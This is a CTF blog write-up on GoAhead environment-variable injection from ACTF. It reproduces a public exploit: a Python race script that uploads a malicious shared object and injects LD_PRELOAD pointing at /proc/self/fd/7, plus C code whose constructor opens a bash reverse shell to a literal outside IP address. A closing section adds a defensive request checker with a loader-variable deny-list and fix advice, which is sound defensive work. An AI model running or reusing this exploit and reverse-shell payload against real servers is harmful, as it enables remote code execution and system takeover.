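I just noticed I haven't updated the blog in a whole month, so I'm pulling out a recent competition to pad things out.
ACTF landed right in my finals week, and I still had to study for those exam subjects, so I only solved one challenge. 烨 from V&N attempted the second challenge; the approach was worked out, but there was no time to finish it.
This challenge is mainly about GoAhead environment variable injection.
Before working on it, I searched around and found a related write-up reproducing the vulnerability with Vulhub.
The details are just the following: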
Github-exploits
exp.py
```python
import requests, random
from concurrent import futures
from requests_toolbelt import MultipartEncoder

hack_so = open('hack.so','rb').read()

def upload(url):
    m = MultipartEncoder(
        fields = {
            'file':('1.txt', hack_so,'application/octet-stream')
        }
    )
    r = requests.post(
        url = url,
        data=m,
        headers={'Content-Type': m.content_type}
    )

def include(url):
    m = MultipartEncoder(
        fields = {
            'LD_PRELOAD': '/proc/self/fd/7',
        }
    )
    r = requests.post(
        url = url,
        data=m,
        headers={'Content-Type': m.content_type}
    )

def race(method):
    url = 'http://localhost:10218/cgi-bin/hello'
    if method == 'include':
        include(url)
    else:
        upload(url)

def main():
    task = ['upload','include'] * 1000
    random.shuffle(task)
    with futures.ThreadPoolExecutor(max_workers=5) as executor:
        results = list(executor.map(race, task))

if __name__ == "__main__":
    main()
```
hack.c
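```c
/* The header names were lost from the page; stdlib.h is the one this code needs. */
#include <stdlib.h>   /* unsetenv(), system() */

__attribute__ ((__constructor__)) void aaanb(void)
{
    unsetenv("LD_PRELOAD");
    system("touch /tmp/success");
    system("/bin/bash -c 'bash -i >& /dev/tcp/150.158.58.29/7777 0>&1'");
}
```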
hack.so
Extract it yourself from GitHub.
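Seen from the defending side, the `include` request in exp.py stands out: a form field named after a loader variable whose value is a `/proc/self/fd/N` path. The check below is an added example, not part of the original write-up or of GoAhead; `audit_request`, `form_fields`, `build_body` and the deny-list are assumed names and an illustrative, non-exhaustive list, and the sample bodies are constructed.

```python
import re
from email.parser import BytesParser
from email.policy import HTTP

# Names that steer the dynamic loader or shell; request data must never set them.
# Illustrative deny-list (an assumption of this example), not exhaustive.
DANGEROUS_NAME = re.compile(r"^(LD_|DYLD_)|^(PATH|IFS|BASH_ENV|ENV)$")
# Values that point the loader at an open descriptor, e.g. an upload temp file.
PROC_FD_VALUE = re.compile(r"^/proc/(self|\d+)/fd/\d+$")

def form_fields(content_type, body):
    """Yield (name, value) for every non-file part of a multipart/form-data body."""
    head = b"Content-Type: " + content_type.encode("ascii") + b"\r\n\r\n"
    msg = BytesParser(policy=HTTP).parsebytes(head + body)
    if not msg.is_multipart():
        return
    for part in msg.iter_parts():
        disp = part["Content-Disposition"]
        if disp is None or "filename" in disp.params:
            continue  # file uploads are not plain form variables
        value = part.get_payload(decode=True) or b""
        yield disp.params.get("name", ""), value.decode("latin-1").strip()

def audit_request(content_type, body):
    """Return a list of findings; an empty list means nothing suspicious."""
    findings = []
    for name, value in form_fields(content_type, body):
        if DANGEROUS_NAME.search(name):
            findings.append(f"loader variable as form field: {name}")
        if PROC_FD_VALUE.match(value):
            findings.append(f"field {name} points at a file descriptor: {value}")
    return findings

def build_body(boundary, fields):
    """Constructed sample input: encode plain form fields as multipart/form-data."""
    out = b""
    for name, value in fields.items():
        out += (f"--{boundary}\r\nContent-Disposition: form-data; "
                f'name="{name}"\r\n\r\n{value}\r\n').encode()
    return out + f"--{boundary}--\r\n".encode()

CT = "multipart/form-data; boundary=constructed-boundary"
BAD = build_body("constructed-boundary", {"LD_PRELOAD": "/proc/self/fd/7"})
GOOD = build_body("constructed-boundary", {"user": "alice", "comment": "hello"})

if __name__ == "__main__":
    print(audit_request(CT, BAD))   # two findings
    print(audit_request(CT, GOOD))  # []
```

The same two patterns can be matched in a WAF rule or in web-server log review; the sturdier fix is on the server side, where form fields should never reach the CGI process environment under attacker-chosen names.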